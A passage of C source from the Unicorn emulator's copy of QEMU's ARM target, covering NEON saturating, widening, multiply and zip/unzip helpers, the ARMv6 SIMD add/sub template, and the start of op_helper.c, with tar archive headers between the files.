SET_QC(); } high = x >> 32; if (high > 0xffff) { high = 0xffff; SET_QC(); } return low | (high << 16); } uint32_t HELPER(neon_narrow_sat_s16)(CPUARMState *env, uint64_t x) { int32_t low; int32_t high; low = x; if (low != (int16_t)low) { low = (low >> 31) ^ 0x7fff; SET_QC(); } high = x >> 32; if (high != (int16_t)high) { high = (high >> 31) ^ 0x7fff; SET_QC(); } return (uint16_t)low | (high << 16); } uint32_t HELPER(neon_unarrow_sat32)(CPUARMState *env, uint64_t x) { if (x & 0x8000000000000000ull) { SET_QC(); return 0; } if (x > 0xffffffffu) { SET_QC(); return 0xffffffffu; } return x; } uint32_t HELPER(neon_narrow_sat_u32)(CPUARMState *env, uint64_t x) { if (x > 0xffffffffu) { SET_QC(); return 0xffffffffu; } return x; } uint32_t HELPER(neon_narrow_sat_s32)(CPUARMState *env, uint64_t x) { if ((int64_t)x != (int32_t)x) { SET_QC(); return ((int64_t)x >> 63) ^ 0x7fffffff; } return x; } uint64_t HELPER(neon_widen_u8)(uint32_t x) { uint64_t tmp; uint64_t ret; ret = (uint8_t)x; tmp = (uint8_t)(x >> 8); ret |= tmp << 16; tmp = (uint8_t)(x >> 16); ret |= tmp << 32; tmp = (uint8_t)(x >> 24); ret |= tmp << 48; return ret; } uint64_t HELPER(neon_widen_s8)(uint32_t x) { uint64_t tmp; uint64_t ret; ret = (uint16_t)(int8_t)x; tmp = (uint16_t)(int8_t)(x >> 8); ret |= tmp << 16; tmp = (uint16_t)(int8_t)(x >> 16); ret |= tmp << 32; tmp = (uint16_t)(int8_t)(x >> 24); ret |= tmp << 48; return ret; } uint64_t HELPER(neon_widen_u16)(uint32_t x) { uint64_t high = (uint16_t)(x >> 16); return ((uint16_t)x) | (high << 32); } uint64_t HELPER(neon_widen_s16)(uint32_t x) { uint64_t high = (int16_t)(x >> 16); return ((uint32_t)(int16_t)x) | (high << 32); } uint64_t HELPER(neon_addl_u16)(uint64_t a, uint64_t b) { uint64_t mask; mask = (a ^ b) & 0x8000800080008000ull; a &= ~0x8000800080008000ull; b &= ~0x8000800080008000ull; return (a + b) ^ mask; } uint64_t HELPER(neon_addl_u32)(uint64_t a, uint64_t b) { uint64_t mask; mask = (a ^ b) & 0x8000000080000000ull; a &= ~0x8000000080000000ull; b &= ~0x8000000080000000ull; return (a + b) ^ mask; } uint64_t HELPER(neon_paddl_u16)(uint64_t a, uint64_t b) { uint64_t tmp; uint64_t tmp2; tmp = a & 0x0000ffff0000ffffull; tmp += (a >> 16) & 0x0000ffff0000ffffull; tmp2 = b & 0xffff0000ffff0000ull; tmp2 += (b << 16) & 0xffff0000ffff0000ull; return ( tmp & 0xffff) | ((tmp >> 16) & 0xffff0000ull) | ((tmp2 << 16) & 0xffff00000000ull) | ( tmp2 & 0xffff000000000000ull); } uint64_t HELPER(neon_paddl_u32)(uint64_t a, uint64_t b) { uint32_t low = a + (a >> 32); uint32_t high = b + (b >> 32); return low + ((uint64_t)high << 32); } uint64_t HELPER(neon_subl_u16)(uint64_t a, uint64_t b) { uint64_t mask; mask = (a ^ ~b) & 0x8000800080008000ull; a |= 0x8000800080008000ull; b &= ~0x8000800080008000ull; return (a - b) ^ mask; } uint64_t HELPER(neon_subl_u32)(uint64_t a, uint64_t b) { uint64_t mask; mask = (a ^ ~b) & 0x8000000080000000ull; a |= 0x8000000080000000ull; b &= ~0x8000000080000000ull; return (a - b) ^ mask; } uint64_t HELPER(neon_addl_saturate_s32)(CPUARMState *env, uint64_t a, uint64_t b) { uint32_t x, y; uint32_t low, high; x = a; y = b; low = x + y; if (((low ^ x) & SIGNBIT) && !((x ^ y) & SIGNBIT)) { SET_QC(); low = ((int32_t)x >> 31) ^ ~SIGNBIT; } x = a >> 32; y = b >> 32; high = x + y; if (((high ^ x) & SIGNBIT) && !((x ^ y) & SIGNBIT)) { SET_QC(); high = ((int32_t)x >> 31) ^ ~SIGNBIT; } return low | ((uint64_t)high << 32); } uint64_t HELPER(neon_addl_saturate_s64)(CPUARMState *env, uint64_t a, uint64_t b) { uint64_t result; result = a + b; if (((result ^ a) & SIGNBIT64) && !((a ^ b) & SIGNBIT64)) { SET_QC(); result = ((int64_t)a >> 63) ^ ~SIGNBIT64; } return result; } /* We have to do the arithmetic in a larger type than * the input type, because for example with a signed 32 bit * op the absolute difference can overflow a signed 32 bit value. */ #define DO_ABD(dest, x, y, intype, arithtype) do { \ arithtype tmp_x = (intype)(x); \ arithtype tmp_y = (intype)(y); \ dest = ((tmp_x > tmp_y) ? tmp_x - tmp_y : tmp_y - tmp_x); \ } while(0) uint64_t HELPER(neon_abdl_u16)(uint32_t a, uint32_t b) { uint64_t tmp; uint64_t result; DO_ABD(result, a, b, uint8_t, uint32_t); DO_ABD(tmp, a >> 8, b >> 8, uint8_t, uint32_t); result |= tmp << 16; DO_ABD(tmp, a >> 16, b >> 16, uint8_t, uint32_t); result |= tmp << 32; DO_ABD(tmp, a >> 24, b >> 24, uint8_t, uint32_t); result |= tmp << 48; return result; } uint64_t HELPER(neon_abdl_s16)(uint32_t a, uint32_t b) { uint64_t tmp; uint64_t result; DO_ABD(result, a, b, int8_t, int32_t); DO_ABD(tmp, a >> 8, b >> 8, int8_t, int32_t); result |= tmp << 16; DO_ABD(tmp, a >> 16, b >> 16, int8_t, int32_t); result |= tmp << 32; DO_ABD(tmp, a >> 24, b >> 24, int8_t, int32_t); result |= tmp << 48; return result; } uint64_t HELPER(neon_abdl_u32)(uint32_t a, uint32_t b) { uint64_t tmp; uint64_t result; DO_ABD(result, a, b, uint16_t, uint32_t); DO_ABD(tmp, a >> 16, b >> 16, uint16_t, uint32_t); return result | (tmp << 32); } uint64_t HELPER(neon_abdl_s32)(uint32_t a, uint32_t b) { uint64_t tmp; uint64_t result; DO_ABD(result, a, b, int16_t, int32_t); DO_ABD(tmp, a >> 16, b >> 16, int16_t, int32_t); return result | (tmp << 32); } uint64_t HELPER(neon_abdl_u64)(uint32_t a, uint32_t b) { uint64_t result; DO_ABD(result, a, b, uint32_t, uint64_t); return result; } uint64_t HELPER(neon_abdl_s64)(uint32_t a, uint32_t b) { uint64_t result; DO_ABD(result, a, b, int32_t, int64_t); return result; } #undef DO_ABD /* Widening multiply. Named type is the source type. */ #define DO_MULL(dest, x, y, type1, type2) do { \ type1 tmp_x = x; \ type1 tmp_y = y; \ dest = (type2)((type2)tmp_x * (type2)tmp_y); \ } while(0) uint64_t HELPER(neon_mull_u8)(uint32_t a, uint32_t b) { uint64_t tmp; uint64_t result; DO_MULL(result, a, b, uint8_t, uint16_t); DO_MULL(tmp, a >> 8, b >> 8, uint8_t, uint16_t); result |= tmp << 16; DO_MULL(tmp, a >> 16, b >> 16, uint8_t, uint16_t); result |= tmp << 32; DO_MULL(tmp, a >> 24, b >> 24, uint8_t, uint16_t); result |= tmp << 48; return result; } uint64_t HELPER(neon_mull_s8)(uint32_t a, uint32_t b) { uint64_t tmp; uint64_t result; DO_MULL(result, a, b, int8_t, uint16_t); DO_MULL(tmp, a >> 8, b >> 8, int8_t, uint16_t); result |= tmp << 16; DO_MULL(tmp, a >> 16, b >> 16, int8_t, uint16_t); result |= tmp << 32; DO_MULL(tmp, a >> 24, b >> 24, int8_t, uint16_t); result |= tmp << 48; return result; } uint64_t HELPER(neon_mull_u16)(uint32_t a, uint32_t b) { uint64_t tmp; uint64_t result; DO_MULL(result, a, b, uint16_t, uint32_t); DO_MULL(tmp, a >> 16, b >> 16, uint16_t, uint32_t); return result | (tmp << 32); } uint64_t HELPER(neon_mull_s16)(uint32_t a, uint32_t b) { uint64_t tmp; uint64_t result; DO_MULL(result, a, b, int16_t, uint32_t); DO_MULL(tmp, a >> 16, b >> 16, int16_t, uint32_t); return result | (tmp << 32); } uint64_t HELPER(neon_negl_u16)(uint64_t x) { uint16_t tmp; uint64_t result; #ifdef _MSC_VER result = (uint16_t)(0 - x); tmp = 0 - (x >> 16); result |= (uint64_t)tmp << 16; tmp = 0 - (x >> 32); result |= (uint64_t)tmp << 32; tmp = 0 - (x >> 48); #else result = (uint16_t)-x; tmp = -(x >> 16); result |= (uint64_t)tmp << 16; tmp = -(x >> 32); result |= (uint64_t)tmp << 32; tmp = -(x >> 48); #endif result |= (uint64_t)tmp << 48; return result; } uint64_t HELPER(neon_negl_u32)(uint64_t x) { #ifdef _MSC_VER uint32_t low = 0 - x; uint32_t high = 0 - (x >> 32); #else uint32_t low = -x; uint32_t high = -(x >> 32); #endif return low | ((uint64_t)high << 32); } /* Saturating sign manipulation. */ /* ??? Make these use NEON_VOP1 */ #define DO_QABS8(x) do { \ if (x == (int8_t)0x80) { \ x = 0x7f; \ SET_QC(); \ } else if (x < 0) { \ x = -x; \ }} while (0) uint32_t HELPER(neon_qabs_s8)(CPUARMState *env, uint32_t x) { neon_s8 vec; NEON_UNPACK(neon_s8, vec, x); DO_QABS8(vec.v1); DO_QABS8(vec.v2); DO_QABS8(vec.v3); DO_QABS8(vec.v4); NEON_PACK(neon_s8, x, vec); return x; } #undef DO_QABS8 #define DO_QNEG8(x) do { \ if (x == (int8_t)0x80) { \ x = 0x7f; \ SET_QC(); \ } else { \ x = -x; \ }} while (0) uint32_t HELPER(neon_qneg_s8)(CPUARMState *env, uint32_t x) { neon_s8 vec; NEON_UNPACK(neon_s8, vec, x); DO_QNEG8(vec.v1); DO_QNEG8(vec.v2); DO_QNEG8(vec.v3); DO_QNEG8(vec.v4); NEON_PACK(neon_s8, x, vec); return x; } #undef DO_QNEG8 #define DO_QABS16(x) do { \ if (x == (int16_t)0x8000) { \ x = 0x7fff; \ SET_QC(); \ } else if (x < 0) { \ x = -x; \ }} while (0) uint32_t HELPER(neon_qabs_s16)(CPUARMState *env, uint32_t x) { neon_s16 vec; NEON_UNPACK(neon_s16, vec, x); DO_QABS16(vec.v1); DO_QABS16(vec.v2); NEON_PACK(neon_s16, x, vec); return x; } #undef DO_QABS16 #define DO_QNEG16(x) do { \ if (x == (int16_t)0x8000) { \ x = 0x7fff; \ SET_QC(); \ } else { \ x = -x; \ }} while (0) uint32_t HELPER(neon_qneg_s16)(CPUARMState *env, uint32_t x) { neon_s16 vec; NEON_UNPACK(neon_s16, vec, x); DO_QNEG16(vec.v1); DO_QNEG16(vec.v2); NEON_PACK(neon_s16, x, vec); return x; } #undef DO_QNEG16 uint32_t HELPER(neon_qabs_s32)(CPUARMState *env, uint32_t x) { if (x == SIGNBIT) { SET_QC(); x = ~SIGNBIT; } else if ((int32_t)x < 0) { #ifdef _MSC_VER x = 0 - x; #else x = -x; #endif } return x; } uint32_t HELPER(neon_qneg_s32)(CPUARMState *env, uint32_t x) { if (x == SIGNBIT) { SET_QC(); x = ~SIGNBIT; } else { #ifdef _MSC_VER x = 0 - x; #else x = -x; #endif } return x; } uint64_t HELPER(neon_qabs_s64)(CPUARMState *env, uint64_t x) { if (x == SIGNBIT64) { SET_QC(); x = ~SIGNBIT64; } else if ((int64_t)x < 0) { #ifdef _MSC_VER x = 0 - x; #else x = -x; #endif } return x; } uint64_t HELPER(neon_qneg_s64)(CPUARMState *env, uint64_t x) { if (x == SIGNBIT64) { SET_QC(); x = ~SIGNBIT64; } else { #ifdef _MSC_VER x = 0 - x; #else x = -x; #endif } return x; } /* NEON Float helpers. */ uint32_t HELPER(neon_abd_f32)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; float32 f0 = make_float32(a); float32 f1 = make_float32(b); return float32_val(float32_abs(float32_sub(f0, f1, fpst))); } /* Floating point comparisons produce an integer result. * Note that EQ doesn't signal InvalidOp for QNaNs but GE and GT do. * Softfloat routines return 0/1, which we convert to the 0/-1 Neon requires. */ uint32_t HELPER(neon_ceq_f32)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; return -float32_eq_quiet(make_float32(a), make_float32(b), fpst); } uint32_t HELPER(neon_cge_f32)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; return -float32_le(make_float32(b), make_float32(a), fpst); } uint32_t HELPER(neon_cgt_f32)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; return -float32_lt(make_float32(b), make_float32(a), fpst); } uint32_t HELPER(neon_acge_f32)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; float32 f0 = float32_abs(make_float32(a)); float32 f1 = float32_abs(make_float32(b)); return -float32_le(f1, f0, fpst); } uint32_t HELPER(neon_acgt_f32)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; float32 f0 = float32_abs(make_float32(a)); float32 f1 = float32_abs(make_float32(b)); return -float32_lt(f1, f0, fpst); } uint64_t HELPER(neon_acge_f64)(uint64_t a, uint64_t b, void *fpstp) { float_status *fpst = fpstp; float64 f0 = float64_abs(make_float64(a)); float64 f1 = float64_abs(make_float64(b)); return -float64_le(f1, f0, fpst); } uint64_t HELPER(neon_acgt_f64)(uint64_t a, uint64_t b, void *fpstp) { float_status *fpst = fpstp; float64 f0 = float64_abs(make_float64(a)); float64 f1 = float64_abs(make_float64(b)); return -float64_lt(f1, f0, fpst); } #define ELEM(V, N, SIZE) (((V) >> ((N) * (SIZE))) & ((1ull << (SIZE)) - 1)) void HELPER(neon_qunzip8)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd0 = rd[0], zd1 = rd[1]; uint64_t zm0 = rm[0], zm1 = rm[1]; uint64_t d0 = ELEM(zd0, 0, 8) | (ELEM(zd0, 2, 8) << 8) | (ELEM(zd0, 4, 8) << 16) | (ELEM(zd0, 6, 8) << 24) | (ELEM(zd1, 0, 8) << 32) | (ELEM(zd1, 2, 8) << 40) | (ELEM(zd1, 4, 8) << 48) | (ELEM(zd1, 6, 8) << 56); uint64_t d1 = ELEM(zm0, 0, 8) | (ELEM(zm0, 2, 8) << 8) | (ELEM(zm0, 4, 8) << 16) | (ELEM(zm0, 6, 8) << 24) | (ELEM(zm1, 0, 8) << 32) | (ELEM(zm1, 2, 8) << 40) | (ELEM(zm1, 4, 8) << 48) | (ELEM(zm1, 6, 8) << 56); uint64_t m0 = ELEM(zd0, 1, 8) | (ELEM(zd0, 3, 8) << 8) | (ELEM(zd0, 5, 8) << 16) | (ELEM(zd0, 7, 8) << 24) | (ELEM(zd1, 1, 8) << 32) | (ELEM(zd1, 3, 8) << 40) | (ELEM(zd1, 5, 8) << 48) | (ELEM(zd1, 7, 8) << 56); uint64_t m1 = ELEM(zm0, 1, 8) | (ELEM(zm0, 3, 8) << 8) | (ELEM(zm0, 5, 8) << 16) | (ELEM(zm0, 7, 8) << 24) | (ELEM(zm1, 1, 8) << 32) | (ELEM(zm1, 3, 8) << 40) | (ELEM(zm1, 5, 8) << 48) | (ELEM(zm1, 7, 8) << 56); rm[0] = m0; rm[1] = m1; rd[0] = d0; rd[1] = d1; } void HELPER(neon_qunzip16)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd0 = rd[0], zd1 = rd[1]; uint64_t zm0 = rm[0], zm1 = rm[1]; uint64_t d0 = ELEM(zd0, 0, 16) | (ELEM(zd0, 2, 16) << 16) | (ELEM(zd1, 0, 16) << 32) | (ELEM(zd1, 2, 16) << 48); uint64_t d1 = ELEM(zm0, 0, 16) | (ELEM(zm0, 2, 16) << 16) | (ELEM(zm1, 0, 16) << 32) | (ELEM(zm1, 2, 16) << 48); uint64_t m0 = ELEM(zd0, 1, 16) | (ELEM(zd0, 3, 16) << 16) | (ELEM(zd1, 1, 16) << 32) | (ELEM(zd1, 3, 16) << 48); uint64_t m1 = ELEM(zm0, 1, 16) | (ELEM(zm0, 3, 16) << 16) | (ELEM(zm1, 1, 16) << 32) | (ELEM(zm1, 3, 16) << 48); rm[0] = m0; rm[1] = m1; rd[0] = d0; rd[1] = d1; } void HELPER(neon_qunzip32)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd0 = rd[0], zd1 = rd[1]; uint64_t zm0 = rm[0], zm1 = rm[1]; uint64_t d0 = ELEM(zd0, 0, 32) | (ELEM(zd1, 0, 32) << 32); uint64_t d1 = ELEM(zm0, 0, 32) | (ELEM(zm1, 0, 32) << 32); uint64_t m0 = ELEM(zd0, 1, 32) | (ELEM(zd1, 1, 32) << 32); uint64_t m1 = ELEM(zm0, 1, 32) | (ELEM(zm1, 1, 32) << 32); rm[0] = m0; rm[1] = m1; rd[0] = d0; rd[1] = d1; } void HELPER(neon_unzip8)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd = rd[0], zm = rm[0]; uint64_t d0 = ELEM(zd, 0, 8) | (ELEM(zd, 2, 8) << 8) | (ELEM(zd, 4, 8) << 16) | (ELEM(zd, 6, 8) << 24) | (ELEM(zm, 0, 8) << 32) | (ELEM(zm, 2, 8) << 40) | (ELEM(zm, 4, 8) << 48) | (ELEM(zm, 6, 8) << 56); uint64_t m0 = ELEM(zd, 1, 8) | (ELEM(zd, 3, 8) << 8) | (ELEM(zd, 5, 8) << 16) | (ELEM(zd, 7, 8) << 24) | (ELEM(zm, 1, 8) << 32) | (ELEM(zm, 3, 8) << 40) | (ELEM(zm, 5, 8) << 48) | (ELEM(zm, 7, 8) << 56); rm[0] = m0; rd[0] = d0; } void HELPER(neon_unzip16)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd = rd[0], zm = rm[0]; uint64_t d0 = ELEM(zd, 0, 16) | (ELEM(zd, 2, 16) << 16) | (ELEM(zm, 0, 16) << 32) | (ELEM(zm, 2, 16) << 48); uint64_t m0 = ELEM(zd, 1, 16) | (ELEM(zd, 3, 16) << 16) | (ELEM(zm, 1, 16) << 32) | (ELEM(zm, 3, 16) << 48); rm[0] = m0; rd[0] = d0; } void HELPER(neon_qzip8)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd0 = rd[0], zd1 = rd[1]; uint64_t zm0 = rm[0], zm1 = rm[1]; uint64_t d0 = ELEM(zd0, 0, 8) | (ELEM(zm0, 0, 8) << 8) | (ELEM(zd0, 1, 8) << 16) | (ELEM(zm0, 1, 8) << 24) | (ELEM(zd0, 2, 8) << 32) | (ELEM(zm0, 2, 8) << 40) | (ELEM(zd0, 3, 8) << 48) | (ELEM(zm0, 3, 8) << 56); uint64_t d1 = ELEM(zd0, 4, 8) | (ELEM(zm0, 4, 8) << 8) | (ELEM(zd0, 5, 8) << 16) | (ELEM(zm0, 5, 8) << 24) | (ELEM(zd0, 6, 8) << 32) | (ELEM(zm0, 6, 8) << 40) | (ELEM(zd0, 7, 8) << 48) | (ELEM(zm0, 7, 8) << 56); uint64_t m0 = ELEM(zd1, 0, 8) | (ELEM(zm1, 0, 8) << 8) | (ELEM(zd1, 1, 8) << 16) | (ELEM(zm1, 1, 8) << 24) | (ELEM(zd1, 2, 8) << 32) | (ELEM(zm1, 2, 8) << 40) | (ELEM(zd1, 3, 8) << 48) | (ELEM(zm1, 3, 8) << 56); uint64_t m1 = ELEM(zd1, 4, 8) | (ELEM(zm1, 4, 8) << 8) | (ELEM(zd1, 5, 8) << 16) | (ELEM(zm1, 5, 8) << 24) | (ELEM(zd1, 6, 8) << 32) | (ELEM(zm1, 6, 8) << 40) | (ELEM(zd1, 7, 8) << 48) | (ELEM(zm1, 7, 8) << 56); rm[0] = m0; rm[1] = m1; rd[0] = d0; rd[1] = d1; } void HELPER(neon_qzip16)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd0 = rd[0], zd1 = rd[1]; uint64_t zm0 = rm[0], zm1 = rm[1]; uint64_t d0 = ELEM(zd0, 0, 16) | (ELEM(zm0, 0, 16) << 16) | (ELEM(zd0, 1, 16) << 32) | (ELEM(zm0, 1, 16) << 48); uint64_t d1 = ELEM(zd0, 2, 16) | (ELEM(zm0, 2, 16) << 16) | (ELEM(zd0, 3, 16) << 32) | (ELEM(zm0, 3, 16) << 48); uint64_t m0 = ELEM(zd1, 0, 16) | (ELEM(zm1, 0, 16) << 16) | (ELEM(zd1, 1, 16) << 32) | (ELEM(zm1, 1, 16) << 48); uint64_t m1 = ELEM(zd1, 2, 16) | (ELEM(zm1, 2, 16) << 16) | (ELEM(zd1, 3, 16) << 32) | (ELEM(zm1, 3, 16) << 48); rm[0] = m0; rm[1] = m1; rd[0] = d0; rd[1] = d1; } void HELPER(neon_qzip32)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd0 = rd[0], zd1 = rd[1]; uint64_t zm0 = rm[0], zm1 = rm[1]; uint64_t d0 = ELEM(zd0, 0, 32) | (ELEM(zm0, 0, 32) << 32); uint64_t d1 = ELEM(zd0, 1, 32) | (ELEM(zm0, 1, 32) << 32); uint64_t m0 = ELEM(zd1, 0, 32) | (ELEM(zm1, 0, 32) << 32); uint64_t m1 = ELEM(zd1, 1, 32) | (ELEM(zm1, 1, 32) << 32); rm[0] = m0; rm[1] = m1; rd[0] = d0; rd[1] = d1; } void HELPER(neon_zip8)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd = rd[0], zm = rm[0]; uint64_t d0 = ELEM(zd, 0, 8) | (ELEM(zm, 0, 8) << 8) | (ELEM(zd, 1, 8) << 16) | (ELEM(zm, 1, 8) << 24) | (ELEM(zd, 2, 8) << 32) | (ELEM(zm, 2, 8) << 40) | (ELEM(zd, 3, 8) << 48) | (ELEM(zm, 3, 8) << 56); uint64_t m0 = ELEM(zd, 4, 8) | (ELEM(zm, 4, 8) << 8) | (ELEM(zd, 5, 8) << 16) | (ELEM(zm, 5, 8) << 24) | (ELEM(zd, 6, 8) << 32) | (ELEM(zm, 6, 8) << 40) | (ELEM(zd, 7, 8) << 48) | (ELEM(zm, 7, 8) << 56); rm[0] = m0; rd[0] = d0; } void HELPER(neon_zip16)(void *vd, void *vm) { uint64_t *rd = vd, *rm = vm; uint64_t zd = rd[0], zm = rm[0]; uint64_t d0 = ELEM(zd, 0, 16) | (ELEM(zm, 0, 16) << 16) | (ELEM(zd, 1, 16) << 32) | (ELEM(zm, 1, 16) << 48); uint64_t m0 = ELEM(zd, 2, 16) | (ELEM(zm, 2, 16) << 16) | (ELEM(zd, 3, 16) << 32) | (ELEM(zm, 3, 16) << 48); rm[0] = m0; rd[0] = d0; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/op_addsub.h�����������������������������������������������������������0000664�0000000�0000000�00000003461�14675241067�0020335�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARMv6 integer SIMD operations. * * Copyright (c) 2007 CodeSourcery. * Written by Paul Brook * * This code is licensed under the GPL. */ #ifdef ARITH_GE #define GE_ARG , void *gep #define DECLARE_GE uint32_t ge = 0 #define SET_GE *(uint32_t *)gep = ge #else #define GE_ARG #define DECLARE_GE do{}while(0) #define SET_GE do{}while(0) #endif #define RESULT(val, n, width) \ res |= ((uint32_t)(glue(glue(uint,width),_t))(val)) << (n * width) uint32_t HELPER(glue(PFX,add16))(uint32_t a, uint32_t b GE_ARG) { uint32_t res = 0; DECLARE_GE; ADD16(a, b, 0); ADD16(a >> 16, b >> 16, 1); SET_GE; return res; } uint32_t HELPER(glue(PFX,add8))(uint32_t a, uint32_t b GE_ARG) { uint32_t res = 0; DECLARE_GE; ADD8(a, b, 0); ADD8(a >> 8, b >> 8, 1); ADD8(a >> 16, b >> 16, 2); ADD8(a >> 24, b >> 24, 3); SET_GE; return res; } uint32_t HELPER(glue(PFX,sub16))(uint32_t a, uint32_t b GE_ARG) { uint32_t res = 0; DECLARE_GE; SUB16(a, b, 0); SUB16(a >> 16, b >> 16, 1); SET_GE; return res; } uint32_t HELPER(glue(PFX,sub8))(uint32_t a, uint32_t b GE_ARG) { uint32_t res = 0; DECLARE_GE; SUB8(a, b, 0); SUB8(a >> 8, b >> 8, 1); SUB8(a >> 16, b >> 16, 2); SUB8(a >> 24, b >> 24, 3); SET_GE; return res; } uint32_t HELPER(glue(PFX,subaddx))(uint32_t a, uint32_t b GE_ARG) { uint32_t res = 0; DECLARE_GE; ADD16(a, b >> 16, 0); SUB16(a >> 16, b, 1); SET_GE; return res; } uint32_t HELPER(glue(PFX,addsubx))(uint32_t a, uint32_t b GE_ARG) { uint32_t res = 0; DECLARE_GE; SUB16(a, b >> 16, 0); ADD16(a >> 16, b, 1); SET_GE; return res; } #undef GE_ARG #undef DECLARE_GE #undef SET_GE #undef RESULT #undef ARITH_GE #undef PFX #undef ADD16 #undef SUB16 #undef ADD8 #undef SUB8 ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/op_helper.c�����������������������������������������������������������0000664�0000000�0000000�00000070144�14675241067�0020347�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARM helper routines * * Copyright (c) 2005-2007 CodeSourcery, LLC * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/log.h" #include "cpu.h" #include "exec/helper-proto.h" #include "internals.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #define SIGNBIT (uint32_t)0x80000000 #define SIGNBIT64 ((uint64_t)1 << 63) static CPUState *do_raise_exception(CPUARMState *env, uint32_t excp, uint32_t syndrome, uint32_t target_el) { CPUState *cs = env_cpu(env); if (target_el == 1 && (arm_hcr_el2_eff(env) & HCR_TGE)) { /* * Redirect NS EL1 exceptions to NS EL2. These are reported with * their original syndrome register value, with the exception of * SIMD/FP access traps, which are reported as uncategorized * (see DDI0478C.a D1.10.4) */ target_el = 2; if (syn_get_ec(syndrome) == EC_ADVSIMDFPACCESSTRAP) { syndrome = syn_uncategorized(); } } assert(!excp_is_internal(excp)); cs->exception_index = excp; env->exception.syndrome = syndrome; env->exception.target_el = target_el; return cs; } void raise_exception(CPUARMState *env, uint32_t excp, uint32_t syndrome, uint32_t target_el) { CPUState *cs = do_raise_exception(env, excp, syndrome, target_el); cpu_loop_exit(cs); } void raise_exception_ra(CPUARMState *env, uint32_t excp, uint32_t syndrome, uint32_t target_el, uintptr_t ra) { CPUState *cs = do_raise_exception(env, excp, syndrome, target_el); cpu_loop_exit_restore(cs, ra); } uint32_t HELPER(neon_tbl)(uint32_t ireg, uint32_t def, void *vn, uint32_t maxindex) { uint32_t val, shift; uint64_t *table = vn; val = 0; for (shift = 0; shift < 32; shift += 8) { uint32_t index = (ireg >> shift) & 0xff; if (index < maxindex) { uint32_t tmp = (table[index >> 3] >> ((index & 7) << 3)) & 0xff; val |= tmp << shift; } else { val |= def & (0xff << shift); } } return val; } void HELPER(v8m_stackcheck)(CPUARMState *env, uint32_t newvalue) { /* * Perform the v8M stack limit check for SP updates from translated code, * raising an exception if the limit is breached. */ if (newvalue < v7m_sp_limit(env)) { CPUState *cs = env_cpu(env); /* * Stack limit exceptions are a rare case, so rather than syncing * PC/condbits before the call, we use cpu_restore_state() to * get them right before raising the exception. */ cpu_restore_state(cs, GETPC(), true); raise_exception(env, EXCP_STKOF, 0, 1); } } uint32_t HELPER(add_setq)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a + b; if (((res ^ a) & SIGNBIT) && !((a ^ b) & SIGNBIT)) env->QF = 1; return res; } uint32_t HELPER(add_saturate)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a + b; if (((res ^ a) & SIGNBIT) && !((a ^ b) & SIGNBIT)) { env->QF = 1; res = ~(((int32_t)a >> 31) ^ SIGNBIT); } return res; } uint32_t HELPER(sub_saturate)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a - b; if (((res ^ a) & SIGNBIT) && ((a ^ b) & SIGNBIT)) { env->QF = 1; res = ~(((int32_t)a >> 31) ^ SIGNBIT); } return res; } uint32_t HELPER(add_usaturate)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a + b; if (res < a) { env->QF = 1; res = ~0; } return res; } uint32_t HELPER(sub_usaturate)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a - b; if (res > a) { env->QF = 1; res = 0; } return res; } /* Signed saturation. */ static inline uint32_t do_ssat(CPUARMState *env, int32_t val, int shift) { int32_t top; uint32_t mask; top = val >> shift; mask = (1u << shift) - 1; if (top > 0) { env->QF = 1; return mask; } else if (top < -1) { env->QF = 1; return ~mask; } return val; } /* Unsigned saturation. */ static inline uint32_t do_usat(CPUARMState *env, int32_t val, int shift) { uint32_t max; max = (1u << shift) - 1; if (val < 0) { env->QF = 1; return 0; } else if (val > max) { env->QF = 1; return max; } return val; } /* Signed saturate. */ uint32_t HELPER(ssat)(CPUARMState *env, uint32_t x, uint32_t shift) { return do_ssat(env, x, shift); } /* Dual halfword signed saturate. */ uint32_t HELPER(ssat16)(CPUARMState *env, uint32_t x, uint32_t shift) { uint32_t res; res = (uint16_t)do_ssat(env, (int16_t)x, shift); res |= do_ssat(env, ((int32_t)x) >> 16, shift) << 16; return res; } /* Unsigned saturate. */ uint32_t HELPER(usat)(CPUARMState *env, uint32_t x, uint32_t shift) { return do_usat(env, x, shift); } /* Dual halfword unsigned saturate. */ uint32_t HELPER(usat16)(CPUARMState *env, uint32_t x, uint32_t shift) { uint32_t res; res = (uint16_t)do_usat(env, (int16_t)x, shift); res |= do_usat(env, ((int32_t)x) >> 16, shift) 